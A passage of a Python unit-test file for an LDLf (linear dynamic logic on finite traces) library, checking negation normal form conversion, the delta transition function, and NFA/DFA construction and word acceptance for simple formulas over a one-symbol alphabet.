eventually_union_tt = PathExpressionEventually(PathExpressionUnion(test_tt, and_ab), tt)
eventually_sequence_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
eventually_star_tt = PathExpressionEventually(PathExpressionSequence(test_tt, and_ab), tt)
self.assertEqual(self.ldlf.to_nnf(tt), tt)
self.assertEqual(self.ldlf.to_nnf(Not(tt)), ff)
self.assertEqual(self.ldlf.to_nnf(Not(and_tt)), Or(ff, ff))
self.assertEqual(self.ldlf.to_nnf(eventually_atomic_tt), eventually_atomic_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_not_tt), eventually_not_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_and_tt), eventually_and_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_test_tt), eventually_test_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_sequence_tt), eventually_sequence_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_union_tt), eventually_union_tt)
self.assertEqual(self.ldlf.to_nnf(eventually_star_tt), eventually_star_tt)
with self.assertRaises(ValueError):
# introduce a new symbol. Throws an error
self.ldlf.to_nnf(eventually_and_tt_error)
def test_to_nnf_derived_formulas(self):
tt = LogicalTrue()
ff = LogicalFalse()
and_ab = And(self.a, self.b)
eventually_test_tt = PathExpressionEventually(PathExpressionTest(self.a), tt)
# to_nnf_trueformula = Or(Not(DUMMY_ATOMIC), DUMMY_ATOMIC)
# to_nnf_false_formula = And(Not(DUMMY_ATOMIC), DUMMY_ATOMIC)
to_nnf_trueformula = TrueFormula()
to_nnf_false_formula = FalseFormula()
to_nnf_end = PathExpressionAlways(to_nnf_trueformula, ff)
to_nnf_not_end = PathExpressionEventually(to_nnf_trueformula, tt)
to_nnf_last = PathExpressionEventually(to_nnf_trueformula, to_nnf_end)
to_nnf_not_last = PathExpressionAlways(to_nnf_trueformula, to_nnf_not_end)
to_nnf_eventually_test_tt = PathExpressionEventually(PathExpressionTest(PathExpressionEventually(self.a, tt)),
tt)
always_ = PathExpressionAlways(and_ab, tt)
not_always_ = PathExpressionEventually(and_ab, ff)
next_ = Next(tt)
until_ = Until(tt, tt)
to_nnf_next_ = PathExpressionEventually(to_nnf_trueformula, And(tt, to_nnf_not_end))
to_nnf_not_next_ = PathExpressionAlways(to_nnf_trueformula, Or(ff, to_nnf_end))
to_nnf_until_ = PathExpressionEventually(
PathExpressionStar(PathExpressionSequence(PathExpressionTest(tt), to_nnf_trueformula)),
And(tt, to_nnf_not_end)
)
to_nnf_not_until_ = PathExpressionAlways(
PathExpressionStar(PathExpressionSequence(PathExpressionTest(tt), to_nnf_trueformula)),
Or(ff, to_nnf_end)
)
self.assertEqual(self.ldlf.to_nnf(ff), ff)
self.assertEqual(self.ldlf.to_nnf(Or(tt, tt)), Or(tt, tt))
self.assertEqual(self.ldlf.to_nnf(always_), always_)
self.assertEqual(self.ldlf.to_nnf(Not(always_)), not_always_)
self.assertEqual(self.ldlf.to_nnf(PathExpressionEventually(TrueFormula(), tt)), PathExpressionEventually(to_nnf_trueformula, tt))
self.assertEqual(self.ldlf.to_nnf(Not(PathExpressionEventually(TrueFormula(), tt))), PathExpressionAlways(to_nnf_trueformula, ff))
self.assertEqual(self.ldlf.to_nnf(PathExpressionEventually(FalseFormula(), tt)), PathExpressionEventually(to_nnf_false_formula, tt))
self.assertEqual(self.ldlf.to_nnf(Not(PathExpressionEventually(FalseFormula(), tt))), PathExpressionAlways(to_nnf_false_formula, ff))
self.assertEqual(self.ldlf.to_nnf(PathExpressionEventually(TrueFormula(), End())), PathExpressionEventually(to_nnf_trueformula, to_nnf_end))
self.assertEqual(self.ldlf.to_nnf(Not(PathExpressionEventually(TrueFormula(), End()))), PathExpressionAlways(to_nnf_trueformula, to_nnf_not_end))
self.assertEqual(self.ldlf.to_nnf(LDLfLast()), to_nnf_last)
self.assertEqual(self.ldlf.to_nnf(Not(LDLfLast())), to_nnf_not_last)
self.assertEqual(self.ldlf.to_nnf(next_), to_nnf_next_)
self.assertEqual(self.ldlf.to_nnf(Not(next_)), to_nnf_not_next_)
self.assertEqual(self.ldlf.to_nnf(until_), to_nnf_until_)
self.assertEqual(self.ldlf.to_nnf(Not(until_)), to_nnf_not_until_)
# a propositional formula is not an elementary formula
self.assertEqual(self.ldlf.to_nnf(and_ab), PathExpressionEventually(and_ab, tt))
# a propositional formula is not elementary, not even inside a Test expression
self.assertEqual(self.ldlf.to_nnf(eventually_test_tt), to_nnf_eventually_test_tt)
class TestLDLfEmptyTracesDelta(TestLDLfEmptyTraces):
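# delta(formula, interpretation) appears to be the one-step transition
# function of the formula automaton: given a formula and a propositional
# interpretation (a frozenset of true symbols), it returns the obligation
# that the remainder of the trace must satisfy.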
def test_delta_simple_recursion(self):
ldlf = self.ldlf
tt = LogicalTrue()
ff = LogicalFalse()
and_ab = self.ldlf.to_nnf(And(self.a, self.b))
eventually_a = PathExpressionEventually(self.a, tt)
eventually_b = PathExpressionEventually(self.b, tt)
self.assertEqual(ldlf.delta(tt, frozenset()), TrueFormula())
self.assertEqual(ldlf.delta(ff, frozenset()), FalseFormula())
self.assertEqual(ldlf.delta(self.a, frozenset()), FalseFormula())
self.assertEqual(ldlf.delta(self.a, frozenset({self.a_sym})), tt)
self.assertEqual(ldlf.delta(eventually_a, frozenset({self.a_sym})), LogicalTrue())
class TestLDLfEmptyTracesToNFA(unittest.TestCase):
def setUp(self):
# configurations
self.print_automata = False
self.a_sym = Symbol("a")
self.b_sym = Symbol("b")
self.c_sym = Symbol("c")
alphabet_a = Alphabet({self.a_sym})
self.alphabet_abc = Alphabet({self.a_sym, self.b_sym, self.c_sym})
self.ldlf_a = LDLf_EmptyTraces(alphabet_a)
self.ldlf_abc = LDLf_EmptyTraces(self.alphabet_abc)
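# Convention used by these to_nfa tests: the result is a plain dict where
# "alphabet" is the set of propositional interpretations (frozensets of
# symbols), "states"/"initial_states"/"accepting_states" are sets of
# macro-states (frozensets of formulas), and "transitions" is a set of
# (source, symbol, target) triples. _to_pythomata_dfa determinizes the NFA
# so that acceptance can be checked with word_acceptance.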
def test_to_nfa_alphabet_a_logical_true(self):
"""tt"""
a = self.a_sym
tt = LogicalTrue()
x = self.ldlf_a.to_nfa(tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt]), frozenset(), frozenset()), # frozenset([TrueFormula()])),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt]), frozenset({a}), frozenset()) # frozenset([TrueFormula()])),
}
final_states = {frozenset([LogicalTrue()]), frozenset()}
initial_state = {frozenset([LogicalTrue()])}
states = {frozenset([LogicalTrue()]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000000_alphabet_a_logical_true.NFA", "./tests/automata/nfa")
print_dfa(x, "000000_alphabet_a_logical_true.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
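# tt holds on every trace, including the empty one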
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_logical_false(self):
"""ff"""
ff = LogicalFalse()
a = self.a_sym
x = self.ldlf_a.to_nfa(ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([LogicalFalse()])}
states = {frozenset([LogicalFalse()]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000001_alphabet_a_logical_false.NFA", "./tests/automata/nfa")
print_dfa(x, "000001_alphabet_a_logical_false.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_tt(self):
"""tt AND tt"""
tt = LogicalTrue()
tt_and_tt = And(tt, tt)
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_and_tt]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_and_tt]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_and_tt])}
initial_state = {frozenset([tt_and_tt])}
states = {frozenset([tt_and_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000002_alphabet_a_tt_and_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000002_alphabet_a_tt_and_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_tt_and_tt_and_tt(self):
"""tt AND tt"""
tt = LogicalTrue()
tt_and_tt_and_tt_and_tt = And(tt, And(tt, And(tt, tt)))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_tt_and_tt_and_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_and_tt_and_tt_and_tt]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_and_tt_and_tt_and_tt]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_and_tt_and_tt_and_tt])}
initial_state = {frozenset([tt_and_tt_and_tt_and_tt])}
states = {frozenset([tt_and_tt_and_tt_and_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000003_alphabet_a_tt_and_tt_and_tt_and_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000003_alphabet_a_tt_and_tt_and_tt_and_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_ff(self):
"""tt AND ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_and_ff = And(tt, ff)
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([tt_and_ff])}
states = {frozenset([tt_and_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000004_alphabet_a_tt_and_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000004_alphabet_a_tt_and_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_and_tt_and_tt_and_ff(self):
"""tt AND ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_and_tt_and_tt_and_ff = And(tt, And(tt, And(tt, ff)))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_and_tt_and_tt_and_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([tt_and_tt_and_tt_and_ff])}
states = {frozenset([tt_and_tt_and_tt_and_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000005_alphabet_a_tt_and_tt_and_tt_and_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000005_alphabet_a_tt_and_tt_and_tt_and_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_or_ff(self):
"""tt OR ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_or_ff = Or(tt, ff)
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_or_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_or_ff]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_or_ff]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_or_ff])}
initial_state = {frozenset([tt_or_ff])}
states = {frozenset([tt_or_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000006_alphabet_a_tt_or_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000006_alphabet_a_tt_or_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_or_ff_or_tt_or_ff(self):
"""tt OR ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_or_ff_or_tt_or_ff = Or(tt, Or(ff, Or(tt, ff)))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_or_ff_or_tt_or_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_or_ff_or_tt_or_ff]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_or_ff_or_tt_or_ff]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_or_ff_or_tt_or_ff])}
initial_state = {frozenset([tt_or_ff_or_tt_or_ff])}
states = {frozenset([tt_or_ff_or_tt_or_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000007_alphabet_a_tt_or_ff_or_tt_or_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000007_alphabet_a_tt_or_ff_or_tt_or_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_tt_or_ff_and_tt_or_ff(self):
"""tt OR ff"""
tt = LogicalTrue()
ff = LogicalFalse()
tt_or_ff_and_tt_or_ff = And(Or(tt, ff), Or(tt, ff))
a = self.a_sym
x = self.ldlf_a.to_nfa(tt_or_ff_and_tt_or_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset([tt_or_ff_and_tt_or_ff]), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([tt_or_ff_and_tt_or_ff]), frozenset({a}), frozenset())
}
final_states = {frozenset(), frozenset([tt_or_ff_and_tt_or_ff])}
initial_state = {frozenset([tt_or_ff_and_tt_or_ff])}
states = {frozenset([tt_or_ff_and_tt_or_ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000008_alphabet_a_tt_or_ff_and_tt_or_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000008_alphabet_a_tt_or_ff_and_tt_or_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertTrue(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_eventually_a_ff(self):
"""<a>ff"""
a = self.a_sym
ff = LogicalFalse()
eventually_a_ff = PathExpressionEventually(AtomicFormula(a), ff)
x = self.ldlf_a.to_nfa(eventually_a_ff)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset([eventually_a_ff]), frozenset({a}), frozenset({ff})),
}
final_states = {frozenset()}
initial_state = {frozenset([eventually_a_ff])}
states = {frozenset([eventually_a_ff]), frozenset([ff]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000009_alphabet_a_eventually_a_ff.NFA", "./tests/automata/nfa")
print_dfa(x, "000009_alphabet_a_eventually_a_ff.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_false(self):
"""false"""
a = self.a_sym
tt = LogicalTrue()
eventually_false_tt = PathExpressionEventually(FalseFormula(), tt)
pl = PL(self.ldlf_a.alphabet)
expanded_false = pl.expand_formula(FalseFormula())
expanded_eventually_false_tt = PathExpressionEventually(expanded_false, tt)
x = self.ldlf_a.to_nfa(eventually_false_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
}
final_states = {frozenset()}
initial_state = {frozenset([expanded_eventually_false_tt])}
states = {frozenset([expanded_eventually_false_tt]), frozenset()}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000010_alphabet_a_eventually_false_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000010_alphabet_a_eventually_false_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_true(self):
"""false"""
a = self.a_sym
tt = LogicalTrue()
eventually_true_tt = PathExpressionEventually(TrueFormula(), tt)
x = self.ldlf_a.to_nfa(eventually_true_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_true_tt}), frozenset(), frozenset({tt})),
(frozenset({eventually_true_tt}), frozenset({a}), frozenset({tt})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_true_tt])}
states = {frozenset(), frozenset([eventually_true_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000011_alphabet_a_eventually_true_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000011_alphabet_a_eventually_true_tt.DFA", "./tests/automata/dfa")
# nfa = _to_pythomata_nfa(x)
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_not_a(self):
"""false"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_not_a_tt = PathExpressionEventually(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(eventually_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({eventually_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_not_a_tt])}
states = {frozenset(), frozenset([eventually_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000012_alphabet_a_eventually_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000012_alphabet_a_eventually_not_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertTrue(dfa.word_acceptance([not_]))
self.assertFalse(dfa.word_acceptance([a_, not_]))
self.assertTrue(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_a(self):
"""false"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_a_tt = PathExpressionEventually(atomic_a, tt)
x = self.ldlf_a.to_nfa(eventually_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_a_tt}), frozenset({a}), frozenset({tt})),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_a_tt])}
states = {frozenset(), frozenset([eventually_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000013_alphabet_a_eventually_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000013_alphabet_a_eventually_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_propositional_a_equivalence(self):
"""a === <a>tt"""
a = self.a_sym
tt = LogicalTrue()
atomic_a = AtomicFormula(a)
eventually_a_tt = PathExpressionEventually(atomic_a, tt)
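# a propositional atom used as a formula is shorthand for <a>tt,
# so both must compile to the same automaton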
self.assertEqual(self.ldlf_a.to_nfa(atomic_a), self.ldlf_a.to_nfa(eventually_a_tt))
def test_to_nfa_alphabet_a_eventually_test_a_tt(self):
"""<a>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_test_a_tt = PathExpressionEventually(PathExpressionTest(atomic_a), tt)
expanded_eventually_test_a_tt = PathExpressionEventually(PathExpressionTest(PathExpressionEventually(atomic_a, tt)), tt)
x = self.ldlf_a.to_nfa(eventually_test_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({expanded_eventually_test_a_tt}), frozenset({a}), frozenset({tt})),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([expanded_eventually_test_a_tt])}
states = {frozenset(), frozenset([expanded_eventually_test_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000014_alphabet_a_eventually_test_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000014_alphabet_a_eventually_test_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertTrue(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
def test_to_nfa_alphabet_a_eventually_sequence_a_not_a_tt(self):
"""<a;a>tt"""
a = self.a_sym
atomic_a = AtomicFormula(a)
tt = LogicalTrue()
eventually_sequence_a_not_a_tt = PathExpressionEventually(PathExpressionSequence(atomic_a, Not(atomic_a)), tt)
eventually_not_a_tt = PathExpressionEventually(Not(atomic_a), tt)
x = self.ldlf_a.to_nfa(eventually_sequence_a_not_a_tt)
# pprint(x)
alphabet = {frozenset(), frozenset({a})}
delta = {
(frozenset(), frozenset(), frozenset()),
(frozenset(), frozenset({a}), frozenset()),
(frozenset({tt}), frozenset(), frozenset()),
(frozenset({tt}), frozenset({a}), frozenset()),
(frozenset({eventually_not_a_tt}), frozenset(), frozenset({tt})),
(frozenset({eventually_sequence_a_not_a_tt}), frozenset({a}), frozenset({eventually_not_a_tt})),
}
final_states = {frozenset(), frozenset([tt])}
initial_state = {frozenset([eventually_sequence_a_not_a_tt])}
states = {frozenset(), frozenset([eventually_sequence_a_not_a_tt]), frozenset([eventually_not_a_tt]), frozenset([tt])}
self.assertEqual(x["alphabet"], alphabet)
self.assertEqual(x["states"], states)
self.assertEqual(x["initial_states"], initial_state)
self.assertEqual(x["accepting_states"], final_states)
self.assertEqual(x["transitions"], delta)
if self.print_automata:
print_nfa(x, "000015_alphabet_a_eventually_sequence_a_not_a_tt.NFA", "./tests/automata/nfa")
print_dfa(x, "000015_alphabet_a_eventually_sequence_a_not_a_tt.DFA", "./tests/automata/dfa")
dfa = _to_pythomata_dfa(x)
empty = []
a_ = frozenset({a})
not_ = frozenset({})
self.assertFalse(dfa.word_acceptance(empty))
self.assertFalse(dfa.word_acceptance([a_]))
self.assertFalse(dfa.word_acceptance([not_]))
self.assertTrue(dfa.word_acceptance([a_, not_]))
self.assertFalse(dfa.word_acceptance([not_, a_]))
